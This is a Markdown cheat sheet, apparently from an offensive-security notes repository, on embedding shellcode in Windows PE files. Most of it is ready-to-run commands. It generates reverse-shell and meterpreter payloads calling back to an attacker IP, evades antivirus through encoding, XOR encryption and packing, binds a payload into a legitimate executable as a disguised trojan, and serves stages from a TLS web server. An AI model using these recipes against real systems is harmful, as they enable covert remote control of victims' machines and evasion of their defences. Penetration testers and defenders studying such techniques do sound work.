killchain-compendium/exploit/windows/Portable Executables/Shellcode.md

96 lines
3.5 KiB
Markdown
Raw Normal View History

2022-09-04 23:49:41 +02:00
# PE Shellcode
## General PE Information
* [PE structure](../../../reverse engineering/windows/portable-executable.md)
## Inserting Shellcode
Multiple sections inside the PE can be used to insert the shellcode. This is defined by how the shellcode variable is initialized. When the shellcode is defined as
* A __local variable__ inside the main function it will be stored in the `.text` section
* A __global variable__ it will be stored in the `.data` section
* A __raw binary__ in an icon image and referencing it will store it in the `.rsrc` section
* A __custom data section__ it is stored in this unusual section
## Crafting Shellcode
2022-09-05 23:32:09 +02:00
* Use msfvenom to generate shellcode which executes the calculator
```sh
msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -f c -o stage.c
```
* Fill in the the missing parts to make it a valid c file
```sh
sed -i '1s/^/#include <windows.h>\n/' stage.c
sed -i 's/=/= {/' stage.c
sed -i 's/;/};/' stage.c
echo -e "int main (void) {\n\tDWORD _protect;\n\tVirtualProtect(buf, sizeof(buf), PAGE_EXECUTE_READ, &_protect);\n\tint (*shellcode)() = (int(*)())(void *)buf;\n\tshellcode();\n\treturn 0;\n}" >> stage.c
```
* Compile it
```sh
i686-w64-mingw32-gcc stage.c -o vcalc.exe
```
### Compile C#
The Microsoft Visual C# compiler is called via
```sh
csc file.cs
```
## Staged C2
* The stage on the target needs to download further parts of the shell into memory
* These parts may be generated in one of the following ways (all of them will be found through AV)
```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f raw -o shell.bin -b '\x00\x0a\x0d'
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f raw -o shellcode.bin -b '\x00' -e x86/shikata_ga_nai -i 3 -f csharp
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f exe --encrypt xor --encrypt-key "verysecretkey" -o xored-revshell.exe
```
* Generate certificate for the webserver
```sh
openssl req -new -x509 -keyout webserver.pem -out webserver.pem -days 365 -nodes
```
* Start the webserver
```sh
sudo python -c "import http.server, ssl;server_address=('0.0.0.0',443);httpd=http.server.HTTPServer(server_address,http.server.SimpleHTTPRequestHandler);httpd.socket=ssl.wrap_socket(httpd.socket,server_side=True,certfile='webserver.pem',ssl_version=ssl.PROTOCOL_TLSv1_2);httpd.serve_forever()"
```
## Generate Custom Shellcode
* The target is to bypass the AV
### Xor and Encode
```sh
msfvenom LHOST=$ATTACKER_IP LPORT=443 -p windows/x64/shell_reverse_tcp -f csharp
```
* Xor and encode the payload, decode the payload on target before it is executed
### Packer
* Compress and obfuscate shellcode inside a binary
* Obviously, an unpacker is needed inside the binary in addition to the packed code
* [mkaring's confuserx](https://github.com/mkaring/ConfuserEx)
* Select the directory and binary
* Go to settings, use packet and create Rules
* Edit the rule as well
* Go to Protect and click the button
### Binding
* Used to merge binaries
* Shellcode will be merged into a legitimate PE and run as an additional thread
```sh
msfvenom -x legitimate.exe -k -p windows/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4711 -f exe -o notsolegitimate.exe
```
* Binded PEs need some disguising as well
2022-09-04 23:49:41 +02:00
## Tools & Tipps
* [hasherezade's PE-bear](https://github.com/hasherezade/pe-bear-releases.git) gives an overview of the PE's sections
* [asmtutor.com](https://asmtutor.com)
2022-09-05 23:32:09 +02:00
* [mvelazc0's staged payload](https://github.com/mvelazc0/defcon27_csharp_workshop/blob/master/Labs/lab2/2.cs)